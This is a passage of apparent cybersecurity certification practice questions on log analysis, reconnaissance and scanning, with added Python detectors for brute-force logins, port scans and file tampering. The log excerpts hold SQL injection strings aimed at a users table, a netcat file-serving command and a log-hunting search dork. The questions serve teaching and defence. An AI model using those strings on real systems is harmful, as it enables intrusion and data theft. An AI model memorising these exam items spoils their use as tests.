C. There was an attempt to edit the 404 page. 
D. The 404 page was displayed. 


84. While reviewing his Apache logs, Charles discovers the following entry. What has
occurred?

10.0.1.1 - - [27/Jun/2017:11:34:23 -0500] "GET /query.php?searchterm=stuff&%20id=1%20UNION%20SELECT%200,username,user_id,password,name,%20email,%20FROM%20users HTTP/1.1" 200 9918 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

A. A successful database query
B. A PHP overflow attack
C. A SQL injection attack
D. An unsuccessful database query


85. What two pieces of information does nmap need to estimate network path distance?

A. IP address and TTL
B. TTL and operating system
C. Operating system and BGP flags
D. TCP flags and IP address

86. Charles needs to make sure he has found the correct social media profile for a target of
his OSINT process. Which of the following includes the three critical items needed to
uniquely identify the majority of Americans?

A. Height, weight, and eye color
B. Date of birth, gender, and zip code
C. Zodiac sign, gender, and zip code
D. Age, height, and weight


87. While reviewing logs from users with root privileges on an administrative jump box, Alex
discovers the following suspicious command:

nc -l -p 43501 < example.zip

What happened?

A. The user set up a reverse shell running as example.zip.
B. The user set up netcat as a listener to push example.zip.
C. The user set up a remote shell running as example.zip.
D. The user set up netcat to receive example.zip.

88. During an on-site penetration test of a small business, Bob scans outward to a known host
to determine the outbound network topology. What information can he gather from the
results provided by Zenmap?

[Screenshot: Zenmap Topology view for the command nmap -sP -PE -PS22,25,80,3389 -PU -PO -traceroute scanme.nmap.org. The traced path, from the scanning host outward, is: localhost, router.asus.com, 96.120.24.121, ge-1-42-ur02.nchicago.il.chicago.comcast.net, 68.85.176.157, be-33491-cr02.350ecermak.il.ibone.comcast.net, be-10563-pe01.350ecermak.il.ibone.comcast.net, chi-b21-link.telia.net, kanc-b1-link.telia.net, sjo-b21-link.telia.net, linode-ic-320384-sjo-b21.c.telia.net, scanme.nmap.org (45.33.32.156).]

A. There are two nodes on the local network.
B. There is a firewall at IP address 96.120.24.121.
C. There is an IDS at IP address 96.120.24.121.
D. He should scan the 10.0.2.0/24 network.
89. Chris discovers the following entries in /var/log/auth.log. What is most likely
occurring?

Aug 6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2
Aug 6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2
Aug 6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2
Aug 6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2
Aug 6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2
Aug 6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2
Aug 6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2
Aug 6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2
Chapter 1 = Domain 1: Threat Management 27 


Aug 6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2
Aug 6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2

A. A user has forgotten their password.
B. A brute-force attack against the root account
C. A misconfigured service
D. A denial-of-service attack against the root account
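What separates the pattern above from a forgotten password is the rate: ten failures from one source inside two seconds, each on a fresh source port. The block below is an added example (not the book's code) that parses sshd "Failed password" lines and applies a sliding-window count per source IP, so that one source with many failures in a short window is flagged while a user who fumbles a password twice ten minutes apart is not. The log lines are constructed to mirror question 89 plus a benign second host; syslog carries no year, so 2017 is assumed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log lines modeled on question 89 (burst from 10.11.34.11)
# plus isolated failures from a second host that should not be flagged.
SAMPLE_AUTH_LOG = [
    "Aug  6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2",
    "Aug  6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2",
    "Aug  6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2",
    "Aug  6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2",
    "Aug  6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2",
    "Aug  6 14:13:01 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2",
    "Aug  6 14:13:01 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2",
    "Aug  6 14:13:01 demo sshd[5280]: Failed password for invalid user admin from 10.11.34.11 port 38463 ssh2",
    "Aug  6 14:13:02 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2",
    "Aug  6 14:13:02 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2",
    "Aug  6 14:20:15 demo sshd[5410]: Failed password for lauren from 10.11.34.50 port 50122 ssh2",
    "Aug  6 14:20:40 demo sshd[5412]: Accepted password for lauren from 10.11.34.50 port 50123 ssh2",
    "Aug  6 14:31:07 demo sshd[5498]: Failed password for lauren from 10.11.34.50 port 50301 ssh2",
]

FAILED_RE = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d{1,2})\s+(?P<time>\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]:\s+"
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_failed_logins(lines, year=2017):
    """Return (timestamp, source_ip, target_user) for each failed login, sorted by time.
    The year is an assumption because syslog timestamps omit it."""
    events = []
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"]))
    events.sort(key=lambda e: e[0])
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Sliding-window count of failures per source IP. An IP is reported when
    `threshold` or more failures fall inside any `window_seconds` span."""
    recent = defaultdict(deque)   # ip -> timestamps inside the current window
    stats = {}
    for ts, ip, user in events:
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        s = stats.setdefault(ip, {"peak": 0, "total": 0, "users": set(), "first": ts, "last": ts})
        s["total"] += 1
        s["users"].add(user)
        s["last"] = ts
        s["peak"] = max(s["peak"], len(q))
    return {ip: s for ip, s in stats.items() if s["peak"] >= threshold}


if __name__ == "__main__":
    for ip, s in detect_bruteforce(parse_failed_logins(SAMPLE_AUTH_LOG)).items():
        print(f"{ip}: {s['total']} failures, peak {s['peak']} in window, users={sorted(s['users'])}")
```

The threshold and window are tuning knobs, not magic numbers: a low-and-slow attacker spreads attempts across hours, so the same data is worth re-running with a longer window and a lower threshold, as the usage in the test does for the second host.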
90. As part of his reconnaissance effort, Charles uses the following Google search string:

"authentication failure; logname=" ext:log site:example.com

What will he find if he receives results from his target's domain?

A. A list of successful logins
B. A list of log names
C. A list of failed logins
D. A list of log files


91. While reviewing email logs for his domain's email server, Rick notices that a single remote
host is sending email to usernames that appear to be in alphabetical order:

aaron@domain.com
abbott@domain.com
abel@domain.com
abigail@domain.com
ada@domain.com
adam@domain.com

This behavior continues for thousands of entries, resulting in many bounced email messages,
but some make it through. What type of reconnaissance has Rick encountered?

A. Brute force
B. Domain harvesting
C. Domain probe
D. Email list builder


92. Which of the following capabilities is not a typical part of an SIEM system?

A. Alerting
B. Performance management
C. Data aggregation
D. Log retention
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93. What major issue would Charles face if he relied on hashing malware packages to identify 
malware packages? 


A. Hashing can be spoofed. 
B. Collisions can result in false positives. 
C. Hashing cannot identify unknown malware. 


D. Hashing relies on unencrypted malware samples. 


Use the following network diagram and scenario to answer the next three questions:

[Network diagram showing Location A, Location B, Location C, and Location D, and the Data Center Network.]

Lauren is a security analyst who has been tasked with performing nmap scans of her organization's
network. She is a new hire and has been given this logical diagram of the organization's
network but has not been provided with any additional detail.


94. Lauren wants to determine what IP addresses to scan from location A. How can she find
this information?

A. Scan the organization's web server and then scan the other 255 IP addresses in its subnet.
B. Query DNS to find her organization's registered hosts.
C. Contact ICANN to request the data.
D. Use traceroute to identify the network that the organization's domain resides in.


95. If Lauren runs a scan from location B that targets the servers on the data center network
and then runs a scan from location C, what differences is she most likely to see between
the scans?

A. The scans will match.
B. Scans from location C will show no open ports.
C. Scans from location C will show fewer open ports.
D. Scans from location C will show more open ports.

96. Lauren wants to perform regular scans of the entire organizational network but only has
a budget that supports buying hardware for a single scanner. Where should she place her
scanner to have the most visibility and impact?

A. Location A
B. Location B
C. Location C
D. Location D
97. Andrea needs to add a firewall rule that will prevent external attackers from conducting
topology gathering reconnaissance on her network. Where should she add a rule intended
to block this type of traffic?

[Diagram: Internet -> A - Firewall -> B - Router -> C - Layer 3 Distribution Switch -> D - Windows 2012 Server]

A. The firewall
B. The router
C. The distribution switch
D. The Windows 2012 server
98. Alex has been asked to investigate a call to one of his organization's system administrators
that is believed to have led to a breach. The administrator described that call by saying that the
caller identified themselves as the assistant to the director of sales and said that they needed
access to a file that was critical to a sales presentation with a major client but that their laptop
had died. The administrator provided a link to the file, which included the organization's
sales data for the quarter. What type of social engineering occurred?

A. Baiting
B. Quid pro quo
C. Pretexting
D. Whaling


99. Which of the three key objectives of cybersecurity is often ensured by using techniques like
hashing and the use of tools like Tripwire?

A. Confidentiality
B. Integrity
C. Identification
D. Availability


100. The netflow collector that Sam's security team uses is capable of handling 1 gigabit of
traffic per second. As Sam's organization has grown, it has increased its external network
connection to a 2 gigabit per second external link and has begun to approach full utilization
at various times during the day. If Sam's team does not have new budget money to
purchase a more capable collector, what option can Sam use to still collect useful data?

A. Enable QoS
B. Enable netflow compression
C. Enable sampling
D. None of the above


101. Senior C-level executives at the organization that Alex works for have received targeted
phishing messages that include a fake organizational login page link and a message that
states that their passwords were inadvertently reset during a scheduled maintenance window.
What type of attack should Alex describe in his after action report?

A. Tuna phishing
B. Whaling
C. Spear phishing
D. SAML phishing
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102. Brandon wants to perform a WHOIS query for a system he believes is located in Europe. 
Which NIC should he select to have the greatest likelihood of success for his query? 


A. AFRINIC 
B. APNIC 

C. RIPE 

D. LACNIC 


103. Chris wants to determine what TCP ports are listening on a Windows system. What is his 
best option to determine this from the command line? 


A. Use arp -a. 
B. Use netstat -lt.
C. Use nmap -t 127.0.0.1.
D. There is not a Windows command to do this.
104. As part of her system hardening process for a Windows 10 workstation, Lauren runs the
Microsoft Baseline Security Analyzer. She sees the following result after MBSA runs. What
can she determine from this scan?

[Screenshot: Microsoft Baseline Security Analyzer result.]
2 share(s) are present on your computer.
Result Details
Access: F - Full, R - Read, W - Write, D - Delete, X - Execute, C - Change

NT SERVICE\TrustedInstaller - F, NT AUTHORITY\SYSTEM - RWXD, BUILTIN\Administrators - RWXD, BUILTIN\Users - RX, APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES - RX, APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES - RX

BUILTIN\Administrators - F, NT AUTHORITY\SYSTEM - F, BUILTIN\Users - RX, NT AUTHORITY\Authenticated Users - D

A. The system has been compromised, and shares allow all users to read and execute administrative files.
B. The system has default administrative shares enabled.
C. The system is part of a domain that uses administrative shares to manage systems.
D. The shares are properly secured and pose no threat to the system.
105. While Greg was performing a port scan of a critical server system, the system administrators
at his company observed the behavior shown here in their network management software
suite. What action should Greg take after he is shown this chart?

[Chart: SolarWinds "Min/Max/Average Response Time & Packet Loss" for the node AMI (AWS), Apr 21 2017 12:30 pm to Apr 22 2017 12:30 pm, plotting average response time, the 95th percentile, min/max response time, and % packet loss on a response-time axis of 0 to 1500 ms.]

A. Increase the number of concurrent scans.
B. Decrease the number of ports scanned.
C. Decrease the number of concurrent scans.
D. Increase the number of ports scanned.
106. An access control system that relies on the operating system to constrain the ability of a 
subject to perform operations is an example of what type of access control system? 
A. A discretionary access control system 
B. A role-based access control system 
C. A mandatory access control system 
D. A level-based access control system 


107. While reviewing Apache logs, Janet sees the following entries as well as hundreds of others
from the same source IP. What should Janet report has occurred?

[21/Jul/2017:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
[21/Jul/2017:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
[21/Jul/2017:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
[21/Jul/2017:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
[21/Jul/2017:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
[21/Jul/2017:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0

A. A denial-of-service attack
B. A vulnerability scan
C. A port scan
D. A directory traversal attack


108. Charles received a pcap file from a system administrator at a remote site who was concerned
about the traffic it showed. What type of behavior should Charles report after his
analysis of the file?

No.  Time      Source        Destination   Protocol  Length  Info
1    0.000000  10.100.25.14  10.100.18.12  TCP       60      1065 > 139 [SYN] Seq=0 Win=8 Len=0
2    0.100476  10.100.25.14  10.100.18.12  TCP       60      19491 > 135 [SYN] Seq=0 Win=8 Len=0
3    0.201152  10.100.25.14  10.100.18.12  TCP       60      7358 > 445 [SYN] Seq=0 Win=8 Len=0
4    0.301714  10.100.25.14  10.100.18.12  TCP       60      27524 > 80 [SYN] Seq=0 Win=8 Len=0
5    0.403133  10.100.25.14  10.100.18.12  TCP       60      20193 > 22 [SYN] Seq=0 Win=8 Len=0
6    0.503604  10.100.25.14  10.100.18.12  TCP       60      1023 > 515 [SYN] Seq=0 Win=8 Len=0
7    0.607512  10.100.25.14  10.100.18.12  TCP       60      16748 > 23 [SYN] Seq=0 Win=8 Len=0
8    0.707986  10.100.25.14  10.100.18.12  TCP       60      12502 > 21 [SYN] Seq=0 Win=8 Len=0
9    0.808340  10.100.25.14  10.100.18.12  TCP       60      30382 > 6000 [SYN] Seq=0 Win=8 Len=0
10   0.904949  10.100.25.14  10.100.18.12  TCP       60      27986 > 1025 [SYN] Seq=0 Win=8 Len=0
11   1.004235  10.100.25.14  10.100.18.12  TCP       60      25488 > 25 [SYN] Seq=0 Win=8 Len=0
12   1.110883  10.100.25.14  10.100.18.12  TCP       60      6729 > 111 [SYN] Seq=0 Win=8 Len=0
13   1.212836  10.100.25.14  10.100.18.12  TCP       60      29169 > 1028 [SYN] Seq=0 Win=8 Len=0
14   1.307771  10.100.25.14  10.100.18.12  TCP       60      24305 > 9100 [SYN] Seq=0 Win=8 Len=0
15   1.407052  10.100.25.14  10.100.18.12  TCP       60      17851 > 1029 [SYN] Seq=0 Win=8 Len=0
16   1.512738  10.100.25.14  10.100.18.12  TCP       60      10985 > 79 [SYN] Seq=0 Win=8 Len=0
17   1.614648  10.100.25.14  10.100.18.12  TCP       60      1515 > 497 [SYN] Seq=0 Win=8 Len=0
18   1.708617  10.100.25.14  10.100.18.12  TCP       60      4019 > 548 [SYN] Seq=0 Win=8 Len=0
19   1.807145  10.100.25.14  10.100.18.12  TCP       60      12966 > 5000 [SYN] Seq=0 Win=8 Len=0
20   1.905446  10.100.25.14  10.100.18.12  TCP       60      5851 > 1917 [SYN] Seq=0 Win=8 Len=0
21   2.017408  10.100.25.14  10.100.18.12  TCP       60      53 > 53 [SYN] Seq=0 Win=8 Len=0
22   2.120446  10.100.25.14  10.100.18.12  TCP       60      6460 > 161 [SYN] Seq=0 Win=8 Len=0
23   2.212668  10.100.25.14  10.100.18.12  TCP       60      33415 > 9001 [SYN] Seq=0 Win=8 Len=0
24   2.311912  10.100.25.14  10.100.18.12  TCP       60      20 > 65535 [SYN] Seq=0 Win=8 Len=0
25   2.418421  10.100.25.14  10.100.18.12  TCP       60      15628 > 443 [SYN] Seq=0 Win=8 Len=0
26   2.520387  10.100.25.14  10.100.18.12  TCP       60      25 > 113 [SYN] Seq=0 Win=8 Len=0
27   2.616615  10.100.25.14  10.100.18.12  TCP       60      4926 > 993 [SYN] Seq=0 Win=8 Len=0
28   2.716744  10.100.25.14  10.100.18.12  TCP       60      1177 > 8080 [SYN] Seq=0 Win=8 Len=0
29   2.819590  10.100.25.14  10.100.18.12  TCP       60      1316 > 2869 [SYN] Seq=0 Win=8 Len=0

A. A DoS attack
B. Port scanning
C. A DDoS attack
D. Service access issues
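The tell in the capture above is structural, not in any single packet: one source sends a bare SYN to a different destination port every tenth of a second, with no payload and no follow-up. The block below is an added example (mine, not the book's) that reads packet summaries in the Wireshark list format, keeps only SYN-without-ACK segments, and flags any source/destination pair that touches many distinct ports within a short window. The sample rows are constructed to mirror question 108, plus a normal three-way handshake from a second host as a control that must not be flagged.

```python
import re
from collections import defaultdict

# Constructed packet summaries (time, src, dst, info) modeled on question 108:
# one host probing many ports on one target, plus a legitimate handshake
# from a different host as a control.
SAMPLE_PACKETS = [
    (0.000000, "10.100.25.14", "10.100.18.12", "1065 > 139 [SYN] Seq=0 Win=8 Len=0"),
    (0.100476, "10.100.25.14", "10.100.18.12", "19491 > 135 [SYN] Seq=0 Win=8 Len=0"),
    (0.201152, "10.100.25.14", "10.100.18.12", "7358 > 445 [SYN] Seq=0 Win=8 Len=0"),
    (0.301714, "10.100.25.14", "10.100.18.12", "27524 > 80 [SYN] Seq=0 Win=8 Len=0"),
    (0.403133, "10.100.25.14", "10.100.18.12", "20193 > 22 [SYN] Seq=0 Win=8 Len=0"),
    (0.503604, "10.100.25.14", "10.100.18.12", "1023 > 515 [SYN] Seq=0 Win=8 Len=0"),
    (0.607512, "10.100.25.14", "10.100.18.12", "16748 > 23 [SYN] Seq=0 Win=8 Len=0"),
    (0.707986, "10.100.25.14", "10.100.18.12", "12502 > 21 [SYN] Seq=0 Win=8 Len=0"),
    (0.808340, "10.100.25.14", "10.100.18.12", "30382 > 6000 [SYN] Seq=0 Win=8 Len=0"),
    (0.904949, "10.100.25.14", "10.100.18.12", "27986 > 1025 [SYN] Seq=0 Win=8 Len=0"),
    (1.004235, "10.100.25.14", "10.100.18.12", "25488 > 25 [SYN] Seq=0 Win=8 Len=0"),
    (1.110883, "10.100.25.14", "10.100.18.12", "6729 > 111 [SYN] Seq=0 Win=8 Len=0"),
    (0.350000, "10.100.25.20", "10.100.18.12", "51000 > 445 [SYN] Seq=0 Win=64240 Len=0 MSS=1460"),
    (0.350400, "10.100.18.12", "10.100.25.20", "445 > 51000 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0"),
    (0.350800, "10.100.25.20", "10.100.18.12", "51000 > 445 [ACK] Seq=1 Ack=1 Win=64240 Len=0"),
]

INFO_RE = re.compile(r"^(?P<sport>\d+)\s*>\s*(?P<dport>\d+)\s+\[(?P<flags>[^\]]*)\]")


def parse_info(info):
    """Split a Wireshark TCP Info string into (sport, dport, {flags}) or None."""
    m = INFO_RE.match(info)
    if not m:
        return None
    flags = {f.strip() for f in m["flags"].split(",")}
    return int(m["sport"]), int(m["dport"]), flags


def detect_port_scans(packets, min_ports=8, window=5.0):
    """Flag (src, dst) pairs whose bare SYNs reach at least `min_ports` distinct
    destination ports inside any `window`-second span. SYN/ACK replies and
    plain ACKs are ignored so a real handshake is never counted as probing."""
    probes = defaultdict(list)           # (src, dst) -> [(time, dport, sport)]
    for t, src, dst, info in packets:
        parsed = parse_info(info)
        if parsed and parsed[2] == {"SYN"}:
            probes[(src, dst)].append((t, parsed[1], parsed[0]))

    findings = []
    for (src, dst), plist in probes.items():
        plist.sort()
        best, lo = 0, 0
        for hi in range(len(plist)):         # sliding window over time
            while plist[hi][0] - plist[lo][0] > window:
                lo += 1
            best = max(best, len({p[1] for p in plist[lo:hi + 1]}))
        if best >= min_ports:
            span = plist[-1][0] - plist[0][0]
            findings.append({
                "src": src, "dst": dst,
                "distinct_ports": len({p[1] for p in plist}),
                "peak_in_window": best,
                "probes_per_second": round(len(plist) / span, 1) if span else float("inf"),
                "source_ports_vary": len({p[2] for p in plist}) > 1,
            })
    return findings


if __name__ == "__main__":
    for f in detect_port_scans(SAMPLE_PACKETS):
        print(f)
```

A vertical scan like this one is the easy case; the same sliding-window idea applied per (src, dport) across many destinations catches the horizontal variant, and lowering the rate (nmap -T0/-T1) only means the window has to be longer.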
109. Susan is reviewing files on a Windows workstation and believes that cmd.exe has been
replaced with a malware package. Which of the following is the best way to validate her
theory?

A. Submit cmd.exe to VirusTotal.
B. Compare the hash of cmd.exe to a known good version.
C. Check the file using the National Software Reference Library.
D. Run cmd.exe to make sure its behavior is normal.
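Questions 99 and 109 rest on the same mechanism: a cryptographic hash taken while a file is known good, compared against the hash of the file later. The block below is an added example (not the book's code, and not Tripwire) that builds a SHA-256 baseline over a directory tree, then re-verifies it and reports modified, missing, and added files, plus the single-file known-good comparison Susan would run on cmd.exe. The files and their contents are constructed in a temporary directory so the example runs anywhere; the names are placeholders, not real Windows binaries.

```python
import hashlib
import os
import tempfile


def sha256_file(path, chunk_size=65536):
    """Stream a file through SHA-256 so large binaries do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root):
    """Map each file under root (relative, '/'-separated path) to its SHA-256."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def verify_against_baseline(root, baseline):
    """Tripwire-style integrity check: what changed, vanished, or appeared."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


def matches_known_good(path, known_good_sha256):
    """The check from question 109: does this file hash to the vendor/NSRL value?"""
    return sha256_file(path).lower() == known_good_sha256.lower()


def _write(root, rel, data):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as fh:
        fh.write(data)


def demo():
    """Baseline a constructed tree, tamper with it three ways, and re-verify."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "bin/cmd.exe", b"original command interpreter (constructed bytes)")
        _write(root, "etc/config.ini", b"[service]\nenabled=1\n")
        _write(root, "lib/helper.dll", b"helper library (constructed bytes)")
        baseline = build_baseline(root)
        known_good_cmd = baseline["bin/cmd.exe"]

        # Simulated compromise: binary replaced, a library removed, a dropper added.
        _write(root, "bin/cmd.exe", b"trojaned command interpreter (constructed bytes)")
        os.remove(os.path.join(root, "lib", "helper.dll"))
        _write(root, "tmp/dropper.exe", b"unexpected new file (constructed bytes)")

        report = verify_against_baseline(root, baseline)
        report["cmd_exe_still_known_good"] = matches_known_good(
            os.path.join(root, "bin", "cmd.exe"), known_good_cmd)
        return report


if __name__ == "__main__":
    print(demo())
```

The baseline is only as trustworthy as where it is stored: if an attacker who can replace cmd.exe can also rewrite the hash database, the check proves nothing, which is why integrity tools keep the baseline offline or signed.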

110. What U.S. government program seeks to provide trusted sources that meet the following
requirements?

- Provide a chain of custody for classified and unclassified integrated circuits
- Ensure that there will not be any reasonable threats related to supply disruption
- Prevent intentional or unintentional modification or tampering of integrated circuits
- Protect integrated circuits from reverse engineering and vulnerability testing

A. Trusted Foundry
B. Chain of Custody
C. Trusted Suppliers
D. Trusted Access Program


111. While reviewing netflows for a system on her network, Alice discovers the following
traffic pattern. What is occurring?


Date flow start Duration Proto Src IP Addr:Port->Dst IP Addr:Port Packets Bytes Flows 
2017-07-11 04:59:32.934 0.000 TCP 10.1.1.1:34543->10.2.2.6:22 1 60 1 
2017-07-11 04:59:39.730 0.000 TCP 10.1.1.1:34544->10.2.2.7:22 1 60 1 
2017-07-11 04:59:46.166 0.000 TCP 10.1.1.1:34545->10.2.2.8:22 1 60 1 
2017-07-11 04:59:52.934 0.000 TCP 10.1.1.1:34546->10.2.2.9:22 1 60 1 
2017-07-11 05:00:06.710 0.000 TCP 10.1.1.1:34547->10.2.2.10:22 1 60 1 
2017-07-11 05:00:46.160 0.000 TCP 10.1.1.1:34548->10.2.2.11:22 1 60 1 
2017-07-11 05:01:32.834 0.000 TCP 10.1.1.1:34549->10.2.2.12:22 1 60 1 
2017-07-11 05:01:39.430 0.000 TCP 10.1.1.1:34550->10.2.2.13:22 1 60 1 
2017-07-11 05:01:46.676 0.000 TCP 10.1.1.1:34551->10.2.2.14:22 1 60 1 
A. telnet scan 

B. ssh scan 

C. ssh scan with unsuccessful connection attempts 

D. sftp scan with unsuccessful connection attempts 
112. Chris wants to gather as much information as he can about an organization using DNS
harvesting techniques. Which of the following methods will most easily provide the most
useful information if they are all possible to conduct on the network he is targeting?

A. DNS record enumeration
B. Zone transfer
C. Reverse lookup
D. Domain brute forcing

113. The national insurance company that Luke works for has experienced a breach, and Luke
is attempting to categorize the impact. As he reviews the incident report, he notes that customer
data that included Social Security numbers was exfiltrated from the organization.
How should he categorize the impact?

A. As a regulated information breach
B. As an intellectual property breach
C. As a confidential information breach
D. As an integrity loss

114. As part of his reconnaissance effort, Chris enters usernames from public information
about a company into a site like checkusernames.com and receives information like the
results shown here. What type of action is he performing?

[Screenshot: checkusernames.com, "Check the use of your brand or username on 160 Social Networks", queried for the username correctbatteryhorsestaple. The results show the name as Available on Wikipedia, Tiny URL, Jimdo, Ning, TypePad, Blogger, Imgur, Issuu, Flickr, WordPress, Steam, LiveLeak, and Daily Motion.]

A. Social engineering
B. Brute-force username guessing
C. Social media profiling
D. Phishing
115. Geoff wants to perform passive reconnaissance as part of an evaluation of his organization's
security controls. Which of the following techniques is a valid technique to perform
as part of a passive DNS assessment?

A. A DNS forward or reverse lookup
B. A zone transfer
C. A WHOIS query
D. Using maltego

116. Mike's penetration test requires him to use passive mapping techniques to discover network
topology. Which of the following tools is best suited to that task?

A. Wireshark
B. nmap
C. netcat
D. Angry IP Scanner

117. Geoff has been asked to identify a technical solution that will reduce the risk of captured
or stolen passwords being used to allow access to his organization's systems. Which of the
following technologies should he recommend?

A. Captive portals
B. Multifactor authentication
C. VPNs
D. OAuth


118. While gathering DNS information about an organization, Chris discovered multiple
AAAA records. What type of reconnaissance does this mean Chris may want to consider?

A. Second-level DNS queries
B. IPv6 scans
C. Cross-domain resolution
D. A CNAME verification

119. Sharon wants to gather email addresses as part of her reconnaissance efforts. Which of the
following tools best suits her needs?

A. nmap
B. cree.py
C. MailSnarf
D. TheHarvester
120. After Charles completes a topology discovery scan of his local network, he sees the
Zenmap topology shown here. What can Charles determine from the Zenmap topology
view?

[Screenshot: Zenmap Topology view showing localhost and the hosts router.demo.com (192.168.1.1), DemoHost2 (192.168.1.17), DemoHost3 (192.168.1.55), DemoPrinter (192.168.1.9), kali (192.168.1.109), DemoHost4 (192.168.1.22), DemoHost4 (192.168.1.79), 192.168.1.215, AZdemo (192.168.1.127), dynamo (192.168.1.…, address cut off in the capture), and STDemo (192.168.1.254).]

A. There are five hosts with port security enabled.
B. DemoHost2 is running a firewall.
C. DemoHost4 is running a firewall.
D. There are four hosts with vulnerabilities and seven hosts that do not have vulnerabilities.


121. Which of the following items is not one of the three important rules that should be 
established before a penetration test? 


A. Timing 

B. Reporting 

C. Scope 

D. Authorization 
122. Scott is part of the white team who is overseeing his organization's internal red and blue
teams during an exercise that requires each team to only perform actions appropriate to
the penetration test phase they are in. During the reconnaissance phase, he notes the following
behavior as part of a Wireshark capture. What should he report?

No.   Time         Source     Destination  Protocol  Length  Info
2180  2.493035366  10.0.2.4   10.0.2.15    TCP       66      80 > 55554 [FIN, ACK] Seq=507 Ack=420 Win=6880 Len=0 TSval=127193 TSecr=317472
2181  2.493271630  10.0.2.15  10.0.2.4     TCP       66      55554 > 80 [FIN, ACK] Seq=420 Ack=508 Win=30336 Len=0 TSval=317472 TSecr=127193
2182  2.493462055  10.0.2.4   10.0.2.15    TCP       66      80 > 55554 [ACK] Seq=508 Ack=421 Win=6880 Len=0 TSval=127193 TSecr=317472
2183  2.496331161  10.0.2.15  10.0.2.4     TCP       66      55552 > 80 [FIN, ACK] Seq=413 Ack=503 Win=30336 Len=0 TSval=317473 TSecr=127192
2184  2.496386675  10.0.2.15  10.0.2.4     TCP       74      55556 > 80 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=317473 TSecr=0 WS=128
2185  2.496500116  10.0.2.4   10.0.2.15    TCP       66      80 > 55552 [ACK] Seq=503 Ack=414 Win=6880 Len=0 TSval=127193 TSecr=317473
2186  2.496520426  10.0.2.4   10.0.2.15    TCP       74      80 > 55556 [SYN, ACK] Seq=0 Ack=1 Win=5792 Len=0 MSS=1460 SACK_PERM=1 TSval=127193 TSecr=317
2187  2.496527886  10.0.2.15  10.0.2.4     TCP       66      55556 > 80 [ACK] Seq=1 Ack=1 Win=29312 Len=0 TSval=317473 TSecr=127193
2188  2.497238098  10.0.2.15  10.0.2.4     HTTP      492     GET /twiki/%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
2189  2.497404022  10.0.2.4   10.0.2.15    TCP       66      80 > 55556 [ACK] Seq=1 Ack=427 Win=6880 Len=0 TSval=127193 TSecr=317473
2190  2.497648036  10.0.2.4   10.0.2.15    HTTP      577     HTTP/1.1 404 Not Found (text/html)
2191  2.497665375  10.0.2.15  10.0.2.4     TCP       66      55556 > 80 [ACK] Seq=427 Ack=512 Win=30336 Len=0 TSval=317473 TSecr=127194
2192  2.497680491  10.0.2.4   10.0.2.15    TCP       66      80 > 55556 [FIN, ACK] Seq=512 Ack=427 Win=6880 Len=0 TSval=127194 TSecr=317473
2193  2.502043782  10.0.2.15  10.0.2.4     TCP       74      55558 > 80 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=317474 TSecr=0 WS=128
